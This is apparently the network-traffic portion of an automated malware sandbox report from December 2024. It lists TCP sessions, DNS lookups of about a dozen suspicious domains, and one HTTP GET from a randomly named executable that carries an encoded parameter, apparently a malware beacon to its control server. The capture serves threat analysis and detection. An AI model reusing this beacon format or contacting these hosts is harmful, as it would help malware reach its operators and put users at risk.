                                                                  Dec 4, 2024 12:52:28.004697084 CET5004380192.168.2.420.2.249.7
                                                                  Dec 4, 2024 12:52:28.124681950 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.124752998 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.125005007 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.125024080 CET805004320.2.249.7192.168.2.4
                                                                  Dec 4, 2024 12:52:28.125148058 CET805004320.2.249.7192.168.2.4
Dec 4, 2024 12:52:28.125164986 CET | 80 | 50043 | 20.2.249.7 | 192.168.2.4
Dec 4, 2024 12:52:28.125444889 CET | 80 | 50043 | 20.2.249.7 | 192.168.2.4
Dec 4, 2024 12:52:28.125456095 CET | 80 | 50043 | 20.2.249.7 | 192.168.2.4
Dec 4, 2024 12:52:28.125545979 CET | 80 | 50043 | 20.2.249.7 | 192.168.2.4
Dec 4, 2024 12:52:29.518404961 CET | 50043 | 80 | 192.168.2.4 | 20.2.249.7
Dec 4, 2024 12:52:29.556543112 CET | 80 | 50043 | 20.2.249.7 | 192.168.2.4
Dec 4, 2024 12:52:29.562396049 CET | 50043 | 80 | 192.168.2.4 | 20.2.249.7
Dec 4, 2024 12:52:29.638812065 CET | 80 | 50043 | 20.2.249.7 | 192.168.2.4
Dec 4, 2024 12:52:29.646399021 CET | 50043 | 80 | 192.168.2.4 | 20.2.249.7
Dec 4, 2024 12:52:30.537442923 CET | 50044 | 80 | 192.168.2.4 | 20.2.249.7
Dec 4, 2024 12:52:30.657494068 CET | 80 | 50044 | 20.2.249.7 | 192.168.2.4
Dec 4, 2024 12:52:30.657572985 CET | 50044 | 80 | 192.168.2.4 | 20.2.249.7
Dec 4, 2024 12:52:30.669382095 CET | 50044 | 80 | 192.168.2.4 | 20.2.249.7
Dec 4, 2024 12:52:30.789150000 CET | 80 | 50044 | 20.2.249.7 | 192.168.2.4
Dec 4, 2024 12:52:32.225622892 CET | 80 | 50044 | 20.2.249.7 | 192.168.2.4
Dec 4, 2024 12:52:32.225784063 CET | 80 | 50044 | 20.2.249.7 | 192.168.2.4
Dec 4, 2024 12:52:32.225833893 CET | 50044 | 80 | 192.168.2.4 | 20.2.249.7
Dec 4, 2024 12:52:32.228988886 CET | 50044 | 80 | 192.168.2.4 | 20.2.249.7
Dec 4, 2024 12:52:32.348835945 CET | 80 | 50044 | 20.2.249.7 | 192.168.2.4
Dec 4, 2024 12:52:37.790525913 CET | 50045 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:37.910257101 CET | 80 | 50045 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:37.910334110 CET | 50045 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:37.927136898 CET | 50045 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:38.047116995 CET | 80 | 50045 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:39.414115906 CET | 80 | 50045 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:39.414305925 CET | 80 | 50045 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:39.414423943 CET | 50045 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:39.440506935 CET | 50045 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:40.458022118 CET | 50046 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:40.579067945 CET | 80 | 50046 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:40.579180002 CET | 50046 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:40.599422932 CET | 50046 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:40.719676018 CET | 80 | 50046 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:42.082777977 CET | 80 | 50046 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:42.082807064 CET | 80 | 50046 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:42.082860947 CET | 50046 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:42.110251904 CET | 50046 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:43.129062891 CET | 50047 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:43.248933077 CET | 80 | 50047 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:43.249115944 CET | 50047 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:43.266453028 CET | 50047 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:43.386307955 CET | 80 | 50047 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:43.386329889 CET | 80 | 50047 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:43.386456013 CET | 80 | 50047 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:43.386465073 CET | 80 | 50047 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:43.386499882 CET | 80 | 50047 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:43.386526108 CET | 80 | 50047 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:43.386709929 CET | 80 | 50047 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:43.386718988 CET | 80 | 50047 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:43.386734962 CET | 80 | 50047 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:44.751914024 CET | 80 | 50047 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:44.766521931 CET | 50047 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:45.788470984 CET | 50048 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:45.909420013 CET | 80 | 50048 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:45.909732103 CET | 50048 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:45.918762922 CET | 50048 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:46.038775921 CET | 80 | 50048 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:47.426070929 CET | 80 | 50048 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:47.426183939 CET | 80 | 50048 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:47.426256895 CET | 50048 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:47.428953886 CET | 50048 | 80 | 192.168.2.4 | 156.251.17.224
Dec 4, 2024 12:52:47.548856974 CET | 80 | 50048 | 156.251.17.224 | 192.168.2.4
Dec 4, 2024 12:52:52.859081030 CET | 50049 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:52.979618073 CET | 80 | 50049 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:52.979737997 CET | 50049 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:52.994168997 CET | 50049 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:53.114332914 CET | 80 | 50049 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:54.298651934 CET | 80 | 50049 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:54.298670053 CET | 80 | 50049 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:54.298683882 CET | 80 | 50049 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:54.298722982 CET | 50049 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:54.298780918 CET | 50049 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:54.501100063 CET | 50049 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:55.522439003 CET | 50050 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:55.642456055 CET | 80 | 50050 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:55.642592907 CET | 50050 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:55.658442974 CET | 50050 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:55.778367996 CET | 80 | 50050 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:56.964818001 CET | 80 | 50050 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:56.964917898 CET | 80 | 50050 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:56.964929104 CET | 80 | 50050 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:56.964993954 CET | 50050 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:57.172818899 CET | 50050 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:58.193053961 CET | 50051 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:58.312808990 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:58.312926054 CET | 50051 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:58.330331087 CET | 50051 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:58.450131893 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:58.450205088 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:58.450325012 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:58.450350046 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:58.450442076 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:58.450450897 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:58.450532913 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:58.450542927 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:58.450552940 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:59.712037086 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:59.712075949 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:59.712086916 CET | 80 | 50051 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:52:59.716475964 CET | 50051 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:52:59.987799883 CET | 50051 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:53:01.004764080 CET | 50052 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:53:01.124653101 CET | 80 | 50052 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:53:01.125210047 CET | 50052 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:53:01.134576082 CET | 50052 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:53:01.254196882 CET | 80 | 50052 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:53:02.437973022 CET | 80 | 50052 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:53:02.438080072 CET | 80 | 50052 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:53:02.438091993 CET | 80 | 50052 | 47.254.140.255 | 192.168.2.4
Dec 4, 2024 12:53:02.438178062 CET | 50052 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:53:02.438206911 CET | 50052 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:53:02.441740990 CET | 50052 | 80 | 192.168.2.4 | 47.254.140.255
Dec 4, 2024 12:53:02.562771082 CET | 80 | 50052 | 47.254.140.255 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 4, 2024 12:49:32.538466930 CET | 52901 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:49:33.157068968 CET | 53 | 52901 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:49:49.675842047 CET | 61182 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:49:50.657403946 CET | 53 | 61182 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:50:05.316675901 CET | 57816 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:50:06.328761101 CET | 57816 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:50:06.685323000 CET | 53 | 57816 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:50:06.685478926 CET | 53 | 57816 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:50:21.332247972 CET | 56612 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:50:22.328877926 CET | 56612 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:50:22.414875984 CET | 53 | 56612 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:50:22.467202902 CET | 53 | 56612 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:50:36.865669012 CET | 58823 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:50:37.445986986 CET | 53 | 58823 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:50:52.058123112 CET | 62920 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:50:52.387238979 CET | 53 | 62920 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:51:07.300940990 CET | 63031 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:51:07.634727001 CET | 53 | 63031 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:51:22.207858086 CET | 64276 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:51:22.885624886 CET | 53 | 64276 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:51:37.554310083 CET | 52256 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:51:38.033061981 CET | 53 | 52256 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:51:52.428934097 CET | 56993 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:51:53.442363024 CET | 56993 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:51:54.454132080 CET | 56993 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:51:56.469928026 CET | 56993 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:51:56.748222113 CET | 53 | 56993 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:51:56.748239994 CET | 53 | 56993 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:51:56.748253107 CET | 53 | 56993 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:51:56.748420000 CET | 53 | 56993 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:51:57.752845049 CET | 63178 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:51:57.892654896 CET | 53 | 63178 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:52:05.074359894 CET | 62347 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:52:05.409758091 CET | 53 | 62347 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:52:19.740488052 CET | 50468 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:52:20.751144886 CET | 50468 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:52:21.757591963 CET | 50468 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:52:22.500828981 CET | 53 | 50468 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:52:22.500848055 CET | 53 | 50468 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:52:22.500941992 CET | 53 | 50468 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:52:37.238986015 CET | 55237 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:52:37.783214092 CET | 53 | 55237 | 1.1.1.1 | 192.168.2.4
Dec 4, 2024 12:52:52.442342997 CET | 62065 | 53 | 192.168.2.4 | 1.1.1.1
Dec 4, 2024 12:52:52.856460094 CET | 53 | 62065 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 4, 2024 12:49:32.538466930 CET | 192.168.2.4 | 1.1.1.1 | 0x72f9 | Standard query (0) | www.nb-shenshi.buzz | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:49:49.675842047 CET | 192.168.2.4 | 1.1.1.1 | 0xa59d | Standard query (0) | www.laohub10.net | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:05.316675901 CET | 192.168.2.4 | 1.1.1.1 | 0x1c70 | Standard query (0) | www.xcvbj.asia | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:06.328761101 CET | 192.168.2.4 | 1.1.1.1 | 0x1c70 | Standard query (0) | www.xcvbj.asia | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:21.332247972 CET | 192.168.2.4 | 1.1.1.1 | 0x9855 | Standard query (0) | www.soainsaat.xyz | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:22.328877926 CET | 192.168.2.4 | 1.1.1.1 | 0x9855 | Standard query (0) | www.soainsaat.xyz | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:36.865669012 CET | 192.168.2.4 | 1.1.1.1 | 0xc924 | Standard query (0) | www.amayavp.xyz | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:52.058123112 CET | 192.168.2.4 | 1.1.1.1 | 0xbfbc | Standard query (0) | www.vayui.top | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:07.300940990 CET | 192.168.2.4 | 1.1.1.1 | 0x6461 | Standard query (0) | www.rgenerousrs.store | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:22.207858086 CET | 192.168.2.4 | 1.1.1.1 | 0x2949 | Standard query (0) | www.t91rl7.pro | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:37.554310083 CET | 192.168.2.4 | 1.1.1.1 | 0x34ee | Standard query (0) | www.learnwithus.site | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:52.428934097 CET | 192.168.2.4 | 1.1.1.1 | 0x559e | Standard query (0) | www.cuthethoi.online | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:53.442363024 CET | 192.168.2.4 | 1.1.1.1 | 0x559e | Standard query (0) | www.cuthethoi.online | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:54.454132080 CET | 192.168.2.4 | 1.1.1.1 | 0x559e | Standard query (0) | www.cuthethoi.online | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:56.469928026 CET | 192.168.2.4 | 1.1.1.1 | 0x559e | Standard query (0) | www.cuthethoi.online | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:57.752845049 CET | 192.168.2.4 | 1.1.1.1 | 0x1419 | Standard query (0) | www.cuthethoi.online | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:05.074359894 CET | 192.168.2.4 | 1.1.1.1 | 0x7a80 | Standard query (0) | www.rafconstrutora.online | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:19.740488052 CET | 192.168.2.4 | 1.1.1.1 | 0x5d8e | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:20.751144886 CET | 192.168.2.4 | 1.1.1.1 | 0x5d8e | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:21.757591963 CET | 192.168.2.4 | 1.1.1.1 | 0x5d8e | Standard query (0) | www.7vh2wy.top | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:37.238986015 CET | 192.168.2.4 | 1.1.1.1 | 0xa0ca | Standard query (0) | www.duwixushx.xyz | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:52.442342997 CET | 192.168.2.4 | 1.1.1.1 | 0x8219 | Standard query (0) | www.yvcp3.info | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 4, 2024 12:49:33.157068968 CET | 1.1.1.1 | 192.168.2.4 | 0x72f9 | No error (0) | www.nb-shenshi.buzz | | 161.97.168.245 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:49:50.657403946 CET | 1.1.1.1 | 192.168.2.4 | 0xa59d | No error (0) | www.laohub10.net | r0lqcud7.nbnnn.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 12:49:50.657403946 CET | 1.1.1.1 | 192.168.2.4 | 0xa59d | No error (0) | r0lqcud7.nbnnn.xyz | | 27.124.4.246 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:49:50.657403946 CET | 1.1.1.1 | 192.168.2.4 | 0xa59d | No error (0) | r0lqcud7.nbnnn.xyz | | 202.79.161.151 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:49:50.657403946 CET | 1.1.1.1 | 192.168.2.4 | 0xa59d | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.159.42 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:49:50.657403946 CET | 1.1.1.1 | 192.168.2.4 | 0xa59d | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.160.132 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:06.685323000 CET | 1.1.1.1 | 192.168.2.4 | 0x1c70 | No error (0) | www.xcvbj.asia | | 149.88.81.190 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:06.685478926 CET | 1.1.1.1 | 192.168.2.4 | 0x1c70 | No error (0) | www.xcvbj.asia | | 149.88.81.190 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:22.414875984 CET | 1.1.1.1 | 192.168.2.4 | 0x9855 | No error (0) | www.soainsaat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 12:50:22.414875984 CET | 1.1.1.1 | 192.168.2.4 | 0x9855 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 12:50:22.414875984 CET | 1.1.1.1 | 192.168.2.4 | 0x9855 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:22.467202902 CET | 1.1.1.1 | 192.168.2.4 | 0x9855 | No error (0) | www.soainsaat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 12:50:22.467202902 CET | 1.1.1.1 | 192.168.2.4 | 0x9855 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 12:50:22.467202902 CET | 1.1.1.1 | 192.168.2.4 | 0x9855 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:37.445986986 CET | 1.1.1.1 | 192.168.2.4 | 0xc924 | No error (0) | www.amayavp.xyz | | 185.27.134.144 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:52.387238979 CET | 1.1.1.1 | 192.168.2.4 | 0xbfbc | No error (0) | www.vayui.top | | 104.21.95.160 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:50:52.387238979 CET | 1.1.1.1 | 192.168.2.4 | 0xbfbc | No error (0) | www.vayui.top | | 172.67.145.234 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:07.634727001 CET | 1.1.1.1 | 192.168.2.4 | 0x6461 | No error (0) | www.rgenerousrs.store | | 104.21.57.248 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:07.634727001 CET | 1.1.1.1 | 192.168.2.4 | 0x6461 | No error (0) | www.rgenerousrs.store | | 172.67.167.146 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:22.885624886 CET | 1.1.1.1 | 192.168.2.4 | 0x2949 | No error (0) | www.t91rl7.pro | | 154.88.22.101 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:38.033061981 CET | 1.1.1.1 | 192.168.2.4 | 0x34ee | No error (0) | www.learnwithus.site | | 209.74.77.107 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:56.748222113 CET | 1.1.1.1 | 192.168.2.4 | 0x559e | Server failure (2) | www.cuthethoi.online | none | none | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:56.748239994 CET | 1.1.1.1 | 192.168.2.4 | 0x559e | Server failure (2) | www.cuthethoi.online | none | none | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:56.748253107 CET | 1.1.1.1 | 192.168.2.4 | 0x559e | Server failure (2) | www.cuthethoi.online | none | none | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:56.748420000 CET | 1.1.1.1 | 192.168.2.4 | 0x559e | Server failure (2) | www.cuthethoi.online | none | none | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:51:57.892654896 CET | 1.1.1.1 | 192.168.2.4 | 0x1419 | Server failure (2) | www.cuthethoi.online | none | none | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:05.409758091 CET | 1.1.1.1 | 192.168.2.4 | 0x7a80 | No error (0) | www.rafconstrutora.online | | 104.21.34.103 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:05.409758091 CET | 1.1.1.1 | 192.168.2.4 | 0x7a80 | No error (0) | www.rafconstrutora.online | | 172.67.159.24 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:22.500828981 CET | 1.1.1.1 | 192.168.2.4 | 0x5d8e | No error (0) | www.7vh2wy.top | | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:22.500848055 CET | 1.1.1.1 | 192.168.2.4 | 0x5d8e | No error (0) | www.7vh2wy.top | | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:22.500941992 CET | 1.1.1.1 | 192.168.2.4 | 0x5d8e | No error (0) | www.7vh2wy.top | | 20.2.249.7 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:37.783214092 CET | 1.1.1.1 | 192.168.2.4 | 0xa0ca | No error (0) | www.duwixushx.xyz | | 156.251.17.224 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 12:52:52.856460094 CET | 1.1.1.1 | 192.168.2.4 | 0x8219 | No error (0) | www.yvcp3.info | | 47.254.140.255 | A (IP address) | IN (0x0001) | false
• www.nb-shenshi.buzz
• www.laohub10.net
• www.xcvbj.asia
• www.soainsaat.xyz
• www.amayavp.xyz
• www.vayui.top
• www.rgenerousrs.store
• www.t91rl7.pro
• www.learnwithus.site
• www.rafconstrutora.online
• www.7vh2wy.top
• www.duwixushx.xyz
• www.yvcp3.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 161.97.168.245 | 80 | 4348 | C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:49:33.295788050 CET486OUTGET /xxr1/?BTPDLZX=CTzPrZCB9Fii6KjTMWJ2M/WncddfpG5VDwI2wO/wDVbWtCCaNtYNYtUcS5/lXeW122DeEWPiybvqXTX+KsM66jciILoGQdVc74SRxgXHJUi2AjDZRtSfQFA=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.nb-shenshi.buzz
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                   Dec 4, 2024 12:49:34.577518940 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:49:34 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 2966
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  ETag: "66cd104a-b96"
